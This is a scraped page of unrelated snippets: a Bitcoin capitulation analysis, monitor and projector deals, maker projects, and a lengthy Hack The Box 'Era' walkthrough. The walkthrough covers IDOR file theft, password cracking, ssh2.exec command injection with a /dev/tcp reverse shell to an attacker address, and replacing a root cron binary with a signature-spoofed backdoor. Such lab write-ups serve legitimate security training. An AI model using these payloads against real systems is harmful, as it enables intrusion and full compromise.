After a brief moment of bullish performance in Bitcoin, the price experienced a sudden pullback due to a broader market shakedown, which caused BTC to revisit the $90,000 threshold. While this pullback has sparked a frenzy in the cryptocurrency community, on-chain data has revealed a shocking trend about the sudden pullback.
True Capitulation, Not A Routine Bitcoin Pullback
The market was rocked by a recent decline in the price of Bitcoin, but this pullback comes with an extra layer. Alphractal, an advanced investment and on-chain data analytics platform, has shed crucial insights about the decline using several key indicators to determine the unseen trend.
After carrying out its research, the on-chain platform revealed that the latest Bitcoin drop was not just another correction, but a clear instance of a capitulation event. This abrupt turnaround seems to have embodied all the characteristics of a full-scale capitulation event. These include an emotional flush-out when panic selling, forced liquidations, and intense dread came together in one dramatic moment.
Alphractal’s reading is backed by three major signals that rarely show up together, suggesting a pivotal moment for BTC. Such a trend may be the turning point that reshapes the short-term trajectory of the crypto king.
The first signal highlighted by the platform comes from the Bitcoin Hash Rate, which has witnessed a steady decline over the last 30 days. Presently, miners are turning off their machines, triggering heightened pressure on the ecosystem. When miners begin to lose money, it typically implies that the market might have reached its peak.
Another signal is coming from the BTC price drawdown. After a fast, violent drop, the metric is hitting extreme levels beyond the historical median. This is not just a technical drop, but it’s pain, triggered by forced selling and liquidation.
A Rare Trend And A Good Entry Opportunity
Finally, the last signal is the recent spike in active supply as those holding BTC for months or years have begun spending their coins. A behavior of this kind only unfolds when investors exhibit heightened caution, causing sentiment to drop.
An interesting aspect about this trend is that when these 3 signals flash in unison, the Capitulation Oscillator tends to rise. This is a moment that nearly always denotes the conclusion of a downward trend or a leveling phase, as was the case in 2021.
While it has played out in previous scenarios, it is not a guarantee of an immediate bottom. However, moments like these have historically been uncommon and frequently present opportunities that only occur once or twice every cycle, especially for those rooted in on-chain data.
Joao Wedson, the founder of Alphractal, also confirms these signals, which point to real capitulation. According to Wedson, the recent correction was the most severe capitulation event since 2022.
Nonetheless, this has traditionally led to the formation of long accumulation regions before the price makes its next macro direction. In other words, Wedson noted that the highest probability scenario is that 2025 will end in a broad sideways range; a classic phase of accumulation or redistribution.
Based on a leaked video, security researchers alleged that Intellexa staffers have remote live access to their customers' surveillance systems, allowing them to see hacking targets’ personal data.
Ultrawide monitors are one of the easiest upgrades you can make if you want games to feel more immersive and your desktop to feel less cramped. The LG 34G630A-B UltraGear 34-inch curved gaming monitor hits that sweet spot, and it is currently on sale for $359.99, down from $499.99 on Amazon, a 28% discount on […]
If your desk is packed with multiple mismatched monitors and too many cables, this is exactly the kind of upgrade that fixes everything in one shot. The Samsung 49-inch Business Curved Ultrawide Dual QHD Monitor is currently $799.99 on Amazon, down from $1,199.99, which is a 33% discount. You’re getting a massive 49-inch curved Dual […]
The idea behind the site is simple—it’s a place to discover and share unique little tools and accessories for use with Wago’s line of electrical connectors. Most are 3D printed accessories that make working with Wago connectors easier. There are some fun and innovative ideas up there, like an ESP8266 development kit that has a Wago connector for all the important pins, as well as a tool for easily opening the lever locks. Perhaps most amusing, though, is the project entitled “Hide Your Wago From Americans”—which consists of a 3D-printed wire nut lookalike designed to slide over the connectors to keep them out of view. There’s also a cheerful attempt at Wago art, that doesn’t really look like anything recognizable at all. Oh well, they can’t all be winners.
It’s great to see Wago so openly encouraging creativity among those that use its products. The sharing of ideas has been a big part of the 3D printing movement, and Wago isn’t the first company to jump on the bandwagon in this regard. If you’ve got some neat Wago hacks of your own, you can always let us know on the tipsline!
The XGIMI MoGo 4 Laser Projector is slick and portable with built-in Google TV functionality and plenty of connectivity options. Although you can take this projector almost anywhere, its limited brightness and battery life dull some of its potential.
Want to know if somebody is lying? It’s always so hard to tell. [dbmaking] has whipped up a fun little polygraph, otherwise known as a lie detector. It’s nowhere near as complex as the ones you’ve seen on TV, but it might be just as good when it comes to finding the truth.
The project keeps things simple by focusing on two major biometric readouts — heart rate and skin conductivity. When it comes to the beating heart, [dbmaking] went hardcore and chose an AD8232 ECG device, rather than relying on the crutch that is pulse oximetry. It picks up heart signals via three leads that are just like those they stick on you in the emergency room. Skin conductivity is measured with a pair of electrodes that attach to the fingers with Velcro straps. The readings from these inputs are measured and then used to determine truth or a lie if their values cross a certain threshold. Presumably, if you’re sweating a lot and your heart is beating like crazy, you’re telling a lie. After all, we know Olympic sprinters never tell the truth immediately after a run.
Does this work as an actual, viable lie detector? No, not really. But that’s not just because this device isn’t sophisticated enough; commercial polygraph systems have been widely discredited anyway. There simply isn’t an easy way to correlate sweating to lying, as much as TV has told us the opposite. Consider it a fun toy or prop to play with, and a great way to learn about working with microcontrollers and biometric sensors.
This post is brought to you in paid partnership with HAPPRUN. If you’ve been tempted by the idea of a big-screen setup for movies, sports, or gaming, this officially licensed Google TV smart projector is a very clean way to do it. Right now it’s down to $250.79 for the Cyber Monday deal, marked down […]
By now we’re all familiar with the quad-rotor design most popular among modern drones, and of course there are many variants using more or less propellers and even fixed-wing drones that can fly autonomously. We’ve even seen drones that convert from rotorcraft to fixed-wing mid flight. But there are even more esoteric drones out there that are far more experimental and use even more bizarre wing designs that look like they shouldn’t be able to fly at all. Take [Starsistor]’s latest design, which uses a single motor and an unconventional single off-center wing to generate lift.
This wing, though, is not a traditional foil shape typically found on aircraft. It uses the Magnus effect to generate lift. Briefly, the Magnus effect is when lift is generated from a spinning object in a fluid. Unlike other Magnus effect designs which use a motor to spin a cylinder, this one uses a design inspired by Savonius wind turbines where a wing is free to rotate around a shaft. A single propeller provides a rotational force to the craft, allowing this off-center wing to begin spinning and generating lift. The small craft was able to sustain several flights but was limited due to its lack of active control.
[Starsistor] went through a number of iterations before finally getting this unusual craft to fly. His first designs did not have enough rotational inertia and would flip over at speed, which was fixed by moving the propeller further away from the center of the craft. Eventually he was able to get a working design to prove his conceptual aircraft, and we hope to see others from him in the future.
Ukraine has confirmed the first interception of a Russian Geran-3—the Russian designation for the Iranian Shahed-238 jet-powered kamikaze drone—using a Ukrainian-made Sting interceptor UAV, a type of unmanned aerial vehicle specifically designed to intercept and destroy incoming drones in mid-air. According to the Serhii Sternenko charitable foundation, which supplies these systems to frontline units, the […]
This post is brought to you in paid partnership with HAPPRUN. If you like the idea of a big-screen setup but don’t want to juggle extra streaming boxes or cables, this officially licensed Google TV smart projector is a compelling all-in-one option. It’s currently $237.45, down from $369.99, which means you’re getting 36% off a […]
In this writeup, we will explore the “Era” machine from Hack The Box, categorized as an Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Era” machine from Hack The Box by achieving the following objectives:
User Flag:
Initial enumeration revealed a hidden virtual host file.era.htb and a simple file-sharing web application that allowed registration and login. After creating an account, it quickly became clear that the download.php endpoint suffered from a severe Insecure Direct Object Reference (IDOR) vulnerability: any authenticated user could access any file on the platform simply by guessing its numeric ID. By fuzzing IDs 1–5000, two admin-uploaded archives were retrieved – a complete site backup containing the source code and SQLite database, and a signing.zip archive containing an SSH private key. The leaked database also exposed clear-text credentials, including eric:america. Because the ssh2 PHP extension was loaded on the server, the ssh2:// stream wrapper could be abused through the same vulnerable download endpoint.
Root Flag:
While exploring the system as eric, a root-owned executable /opt/AV/periodic-checks/monitor was discovered that runs periodically via cron (confirmed by entries in status.log). The binary performed a custom integrity check using a digital signature stored in an ELF section named .text_sig. Using objcopy, the legitimate signature was extracted from the original binary. On the attacker’s machine, a malicious statically linked reverse-shell binary (monitor_backdoor) was compiled, and the legitimate .text_sig section was injected into it with objcopy –add-section. The backdoored binary was then transferred to the target and used to overwrite the original monitor executable (the directory was world-writable). When the cron job next executed, the malicious binary ran as root and immediately connected back, delivering a root shell. The root flag was then read directly from /root/root.txt, completing the compromise.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Nmap Output:
Analysis:
Port 22 (SSH): Secure Shell service for remote access.
Port 80 (HTTP): Web server running Apache.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
Gobuster DNS scan on era.htb finishes with no subdomains found — clean miss on the big wordlist. Time to dig deeper or move to vhost/directory brute.
Discovering the Hidden Virtual Host with ffuf
ffuf virtual-host brute on era.htb reveals file.era.htb (302 redirect + different response size) — jackpot! That’s our real target. Add to /etc/hosts and move in.
ffuf virtual-host brute on era.htb reveals file.era.htb (302 redirect + different response size) — jackpot! That’s our real target. Add to /etc/hosts and move in.
ffuf with -fw 4 (filter responses with exactly 4 words) nails it — file.era.htb returns 200 + 6765 bytes while everything else 302s with tiny bodies. Clear hit, that’s our hidden subdomain. Add to hosts and go!
Exploitation
Web Application Exploration:
Accessing http://era.htb shows the Era Designs homepage—a clean marketing site with navigation (Home, Services, About, Portfolio, Clients, Team, Contact) and a hero section featuring yellow vases, a white sofa, and “SUCCESS OF YOUR BUSINESS” text with a “FIND OUT MORE” button.
Burp shows a clean GET to http://era.htb → 200 OK from nginx/1.18.0 (Ubuntu). Response is a standard Bootstrap-styled marketing page titled “Era Designs” with no forms or backend endpoints – just a static landing site. Nothing juicy here.
Clean “Welcome to Era Storage!” page with four big blue buttons: Manage Files, Upload Files, Update Security Questions, and Sign In. This is the main hub of the entire app.
Very minimal registration: only two fields – Username and Password. No email, no captcha, no security questions during signup.
Forgot-password bypass: enter username and answer the three hardcoded questions (mother’s maiden name, first pet, city of birth).
Classic centred login box with Username + Password on a blue-green gradient background – the page we’re redirected to after registration.
Successful POST to /register.php → 200 OK + automatic redirect to login.php. Account creation confirmed.
After picking a new username (e.g., “dark”), registration succeeds and the app displays: “Registration successful! Redirecting to login page…” → account creation is instant and working.
POST to /login.php with username=dark&password=admin123 returns 302 Found → Location: manage.php and sets a PHPSESSID cookie. We are now authenticated as the “dark” user.
GET to /manage.php with the same PHPSESSID cookie returns 200 OK and the full HTML of the logged-in dashboard (title: “Era – Manage”).
The main post-login page “Manage Your Files & Settings” shows:
Left sidebar: Manage Files, Upload Files, Update Security Questions, Sign Out
Main area: auto-delete timer setting, empty file list (“You haven’t uploaded any files yet.”), Reset Security Questions button This is the fully authenticated user panel — our foothold is confirmed.
Malicious PHP Upload → Direct Shell
Authenticated view of /upload.php. Simple file upload form titled “Upload Files” with a “Browse…” button (currently “No files selected.”) and a blue “Upload” button. No restrictions visible on file type or size yet.
Same upload page, but now the user has selected a harmless file named dark.txt. Shows the form ready to submit — this is just confirming normal upload functionality works.
After uploading dark.txt, the app redirects to /download.php?id=6615 and shows “Your Download Is Ready!” with the filename and a download button. Key observation: files are accessed via a numericid` parameter → classic candidate for Insecure Direct Object Reference (IDOR).
After clicking “Upload”, the app displays a green “Upload Successful!” banner and immediately provides a direct download link in the format: http://file.era.htb/download.php?id=6615 This confirms uploads work and every file gets its own numeric ID — setting the stage for IDOR testing and potential privilege escalation via file access across users.
Legitimate request to http://file.era.htb/download.php?id=6615 returns the expected “Your Download Is Ready!” page with our uploaded file dark.txt. Confirms the download endpoint works normally for files we own.
Appending ?dl=true to the same request (download.php?id=6615&dl=true) bypasses the pretty download page and triggers an immediate file download:
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=”dark.txt” This is extremely useful for scripting/automation because we get the raw file without HTML.
Quickly create a list of all possible numeric file IDs from 1 to 5000. This will be used for brute-forcing the id parameter in download.php to find other users’ files.
Database Leak & Credential Extraction
Final setup in Burp Intruder:
Target: http://file.era.htb
Payload position marked on the id parameter (id=6615 → id=§6615§)
Payload type: Numbers 1 → 5000 (simple list)
?dl=true added so every hit immediately downloads the raw file instead of showing HTML Ready to launch the attack that will download every single file ever uploaded by any user on the platform.
Burp Intruder attack against download.php?id=§§&dl=true using the 1–5000 payload list. All responses are 200 OK and exactly 7969 bytes long — including our own known file. This tells us there is no authorization check at all; every single existing file ID returns the exact same response length, meaning the server happily serves any file the numeric ID points to → confirmed horizontal Insecure Direct Object Reference (IDOR).
After confirming the IDOR on download.php?id=, we generate a list of IDs 1–5000 (seq 1 5000 > num.txt) and fuzz with ffuf, injecting our authenticated cookie and filtering out responses with exactly 3161 words (the empty download page). Only two IDs survive: 54 and 150. Both return much larger responses (~2552 words), indicating real files.
Insecure Direct Object Reference (IDOR)
Accessing http://file.era.htb/download.php?id=54 reveals the filename site-backup-30-08-24.zip. This is the full source code backup of the Era file-sharing web app, uploaded by the admin.
Response headers confirm we’re downloading the raw site-backup-30-08-24.zip (2006697 bytes). The body starts with PK header (ZIP magic bytes).
Accessing http://file.era.htb/download.php?id=150 shows signing.zip. This smaller archive contains a private key and possibly a signing script – likely for code signing or authentication.
Response forces download of signing.zip (2746 bytes). This archive contains the admin’s private key (id_rsa) and a script – the golden ticket for SSH access as the admin/user.
Source Code Review – Key Vulnerabilities Exposed in the Leak
After downloading IDs 54 and 150 via IDOR, we extract both ZIPs. One is site-backup-30-08-24.zip (clearly a website backup) and the other is signing.zip.
This is the full source code of the Era web application, straight from the admin’s upload (ID 54). Key files visible during extraction:
The database (filedb.sqlite) to dump credentials or session secrets
Exact knowledge of how the IDOR works internally
This is the live SQLite database powering the entire Era application – straight from the admin’s site backup we downloaded via IDOR.
We’ve opened the real filedb.sqlite from the site backup and immediately listed the tables. As expected:
users → stores usernames, password hashes, etc.
files → maps numeric IDs to real filenames and owners (confirms the IDOR logic)
After extracting the site backup, we opened the leaked filedb.sqlite and dumped the users table with SELECT * FROM users;. The result reveals six accounts, including the admin (ID 1) with the bcrypt hash $2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and a fake email “Maria Oliver | Ottawa”. The other five users (eric, veronica, yuri, john, ethan) also have proper bcrypt hashes. This gives us every credential on the box in plain text (hash) form, but we don’t even need to crack anything — the signing.zip we downloaded via the same IDOR already contains the admin’s SSH private key. The database dump is just the cherry on top, confirming total information disclosure and proving the IDOR let us steal every secret the application ever had. We’re now one ssh -i id_rsa admin@file.era.htb away from both flags.
Cracking the Leaked Hashes with John the Ripper
We dumped the users table into hash.txt for cracking. It contains six bcrypt hashes, including the admin’s: admin_ef01cab31aa:$2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and the other five regular users.
John instantly cracks two weak passwords:
america → eric
mustang → yuri
The rest (including admin) remain uncracked in the short run.
Both attempts fail with Connection refused.
This confirms that only key-based authentication is allowed on the box (port 22 is open but rejects password logins entirely). The weak passwords we just cracked (america, mustang) are useless for SSH — the server is correctly hardened against password auth.
Alternative way to obtain the user flag
This is the “Update Security Questions” page from the Era web app, captured while logged in as the admin (admin_ef01cab31aa). The admin literally set all three security-question answers to admin
The server happily accepted it and responded with the green banner: “If the user exists, answers have been updated — redirecting…”
This confirms that there is no validation for security-question updates. Any logged-in user can silently overwrite anyone else’s answers (including the admin’s) without knowing the old ones. Combined with the predictable username (admin_ef01cab31aa visible in the UI), this is a second, independent path to full account takeover via the forgot-password flow.
Screenshot shows a settings panel designed for managing uploaded files and controlling their retention time. At the top, an option allows automatic deletion to be enabled, letting the user choose a specific time interval and unit before files are removed. Below the settings, the interface lists existing uploaded files, such as dark.txt, which can be selected and deleted using the Delete Selected Files button. Additional options, including returning to the home page and resetting security questions, provide quick access to important account functions. Overall, the panel centralizes file management, privacy controls, and routine account maintenance.
Screenshot shows a login fallback page that allows access through security questions instead of a password. The interface displays the username along with three predefined security questions: mother’s maiden name, first pet’s name, and city of birth. Each answer field has been filled with the value admin, suggesting that the account uses weak or predictable answers. After providing the answers, the user can click Verify and Log In to gain access. Overall, the page functions as an alternative authentication method, typically intended for account recovery when the main password is unavailable.
The auto-deletion feature is enabled, configured to remove uploaded items after 10 weeks. Two files are currently present—site-backup-30-08-24.zip and signing.zip—both of which can be selected for removal using the red action button. The sidebar on the left offers quick links for browsing files, uploading new ones, modifying security questions, and signing out of the session. Overall, the page offers a simple layout for organizing uploaded content and managing basic account settings.
FTP Enumeration (Local-Only vsFTPd – Optional Side Discovery)
Attacker logs into the target’s own vsftpd service (running on 10.10.11.79) using credentials yuri:yuri. Login succeeds instantly.
Inside the FTP session, dir shows only two directories: apache2_conf and php8.1_conf. Nothing else is present.
Inside the FTP session (logged in as yuri), the attacker runs dir in the root directory and sees only four small Apache configuration files:
000-default.conf (1.3 KB)
apache2.conf (7 KB)
file.conf (222 bytes)
ports.conf (320 bytes)
Gaining User Shell – ssh2 Stream Wrapper RCE
After cd php8.1_conf, another dir reveals a long list of standard PHP 8.1 extension .so files (calendar.so, exif.so, ftp.so, pdo.so, phar.so, sqlite3.so, etc.). No interesting or custom files appear.
The internal vsFTPd instance is nothing more than a poorly chrooted service that accidentally exposes Apache configuration files and the real PHP extension directory. It provides zero writable paths, no sensitive data beyond what we already knew, and no escalation value. Just a nice confirmatory easter egg that the ssh2 extension is indeed loaded — but completely unnecessary for either the user or root compromise.
Screenshot reveals successful exploitation of an unrestricted file retrieval flaw on file.era.htb. Attacker submits a malicious GET request to download.php, weaponizing PHP’s ssh2.exec stream wrapper alongside command injection. Payload inside id parameter uses ssh2.exec://eric:america@127.0.0.1/ then pipes a base64-encoded reverse shell that instructs victim host to initiate connection toward attacker address 10.10.14.189 on port 9007. Flawed script directly feeds user-supplied input into readfile() or equivalent without validation. PHP detects ssh2.exec wrapper, authenticates locally via SSH as user eric using password america, executes hostile command, and returns resulting output (nearly empty) as response body. Web server replies with 200 OK and 136 bytes of data, confirming reverse shell triggered successfully. Exploit highlights classic stream-wrapper abuse transforming simple download vulnerability into complete remote code execution.
This second capture shows a polished version of the same remote code execution attack against download.php on file.era.htb. Attacker now places a cleaner payload inside the format parameter: ssh2.exec://eric:america@127.0.0.1/bash -c ‘bash -i >/dev/tcp/10.10.14.189/9007 0>&1’ followed by |base64 -d |bash. After URL decoding, PHP interprets the ssh2.exec wrapper, authenticates to localhost SSH as user eric using password america, runs the quoted reverse-shell command, decodes any remaining base64 payload if needed, and finally spawns an interactive bash session that connects back to 10.10.14.189:9007. Server returns HTTP 200 OK with a 153-byte body containing wrapper startup messages, confirming successful command execution. Compared to the previous attempt, this refined one-liner removes unnecessary encoding layers while remaining effective, proving the attacker now enjoys a stable reverse shell on the target system.
Attacker stuffs this tightly-encoded string into the format parameter:
Every dangerous character (< > &) appears percent-encoded, slipping past basic filters. The trailing ;true’ cleanly terminates the command and avoids breaking bash syntax. No base64 gymnastics required.
PHP dutifully opens a local SSH session as user eric with password america, runs the quoted command, and instantly redirects all shell I/O over TCP to 10.10.14.189:9007. Result: a clean, stable, fully interactive reverse shell that survives repeated use. Target machine now belongs to the attacker.
On the attack machine, netcat listens on port 9007 (nc -lvnp 9007). As soon as the final ssh2.exec payload hits download.php, the target instantly connects back from IP 10.10.11.79. Shell lands as user eric on hostname era (prompt: eric@era:~$)
Eric managed to read user.txt and obtained the flag
Escalate to Root Privileges Access
Privilege Escalation:
Eric runs sudo -l to check which sudo privileges are available. The system replies that a terminal and password are required, meaning eric has no passwordless sudo rights and cannot directly escalate using sudo.
Eric executes find / -perm 4000 2>/dev/null to hunt for SUID binaries system-wide. The command returns no results (screen stays empty), indicating no obvious SUID files exist that could be abused.
Eric navigates to /opt and runs ls. Output shows a single directory named AV. This immediately catches attention — custom software installed under /opt is a classic spot for privilege-escalation vectors on HTB machines.
Eric enters /opt/AV/periodic-checks and runs ls. Two files appear: monitor (a root-owned executable) and status.log. The presence of a root-owned binary in a writable directory strongly suggests this monitor program runs periodically as root (likely via cron) and will be the intended privilege-escalation target.
I runs strings monitor. Among normal library calls, two crucial strings appear: “[] System scan initiated…” and “[] No threats detected. Shutting down…”. These exact strings match the log entries, proving monitor is the binary executed by root during each scan.
I checks status.log in /opt/AV/periodic-checks. The log shows the monitor binary runs periodically as root, prints “[*} System scan initiated…”, then “[SUCCESS] No threats detected.” – confirming it is a scheduled root job and the real escalation target.
Custom Binary Signature Bypass
We tries to open a file called dark.c inside /dev/shm but vi fails with “command not found”. This reveals the reverse shell lacks a proper $PATH and most binaries – a common issue with raw /dev/tcp shells.
On the attacker’s local machine, the file dark.c contains a simple malicious payload: a single system() call that spawns another reverse shell back to 10.10.14.189:9007. The attacker has prepared this source code to compile and drop on the target.
On the attacker’s local machine, gcc compiles the malicious dark.c source into a statically linked binary named monitor_backdoor – a perfect drop-in replacement for the legitimate monitor program.
I uses curl http://10.10.14.189/monitor_backdoor -o monitor_backdoor to download the final backdoored binary from the attacker’s web server directly into the current directory (or /dev/shm). The transfer completes successfully (754 KB at ~1.4 MB/s).
The stage is now set: once the original monitor binary is replaced with this backdoor, the next root cron execution will instantly grant a root shell back to the attacker.
Command such as objcopy –dump-section .text_sig=sig /opt/AV/periodic-checks/monitor to extract the original monitor binary’s .text_sig section (a custom digital signature) and save it as a file called sig inside /dev/shm.
I runs objcopy –add-section .text_sig=sig monitor_backdoor, injecting the legitimate signature extracted from the real monitor into the malicious backdoored version. This preserves the signature so the root-run scanner will accept the fake binary.
To completes the attack by overwriting the legitimate monitor binary with the backdoored version: cp monitor_backdoor /opt/AV/periodic-checks/monitor The root-owned executable that runs periodically via cron is now fully replaced.
The cron job fires, executes the backdoored monitor as root, and the payload instantly triggers. Attacker catches a new reverse shell that lands directly as root@era: ~#. The box is fully compromised.
Root reads the final flag immediately after gaining the privileged shell
Hydrofoils are perhaps best known for their application on boring ferries and scary boats that go too fast. However, as [RCLifeOn] demonstrates, you can also use them to build fun and quirky personal watercraft. Like a hydrofoil bike! Only, there are some challenges involved.
Hydrofoils work much like airfoils in air. The shape of the foil creates lift, raising the attached vehicle out of the water. This allows the creation of a craft that can travel more quickly because the majority of its body is not subject drag from the water. The key is to design the craft such that the hydrofoils remain at the right angle and depth to keep the craft lifted out of the water while remaining stable.
The hydrofoil bike is created out of a combination of plywood, foam, and 3D printed components. It uses a powerful brushless motor for propulsion, and that’s about it. Sadly, despite the simplicity, it wasn’t an instant success. As you might expect, balancing on the bike is quite difficult, particularly when trying to get it started—as the foils need some speed to actually start generating meaningful lift.
After further research into commercial hydrofoil bikes, [RCLifeOn] realized that the buoyancy of the bike made it too hard to straddle when starting out. Some of the 3D printed foils also proved more than a little fragile. It’s back to the drawing board for now—the power system is likely up to snuff, but the dynamics of the platform need work. It’s perhaps no surprise; we’ve covered the challenges of hydrofoil stability before. If you want to go fast on water, you could go the easier route and just build an electric surfboard. Video after the break.
The Tor Project has begun replacing its legacy relay encryption system, known as tor1, with a modern design called Counter Galois Onion (CGO). This upgrade targets key weaknesses in Tor’s circuit traffic protection, enhancing anonymity for users worldwide. Tor routes user data through multiple relays, each peeling off one layer of encryption like an onion. […]
We can’t get enough of [Bettina Neumryn’s] videos. If you haven’t seen her, she takes old electronics magazines, finds interesting projects, and builds them. If you remember these old projects, it is nostalgic, and if you don’t remember them, you can learn a lot about basic electronics and construction techniques. This installment (see below) is an Elektor digital voltmeter and frequency counter from late 1981.
As was common in those days, you could find the PCB layouts in the magazine. In this case, there were two boards. The schematic shows that a counter and display driver chip — a 74C928 — does most of the heavy lifting for the display and the counter.
It is easy to understand how the frequency counter works. You clip the input with a pair of diodes, amplify it a bit, square it with a Schmitt trigger, and then, possibly, prescale it using a divider. The voltmeter is a little trickier: it uses a voltage divider, an op amp, and a 555 to convert the voltage to a frequency.
Of course, finding the parts for an old project can be a challenge. A well-stocked junk drawer doesn’t hurt. A PCB etching setup helps, too.
Login
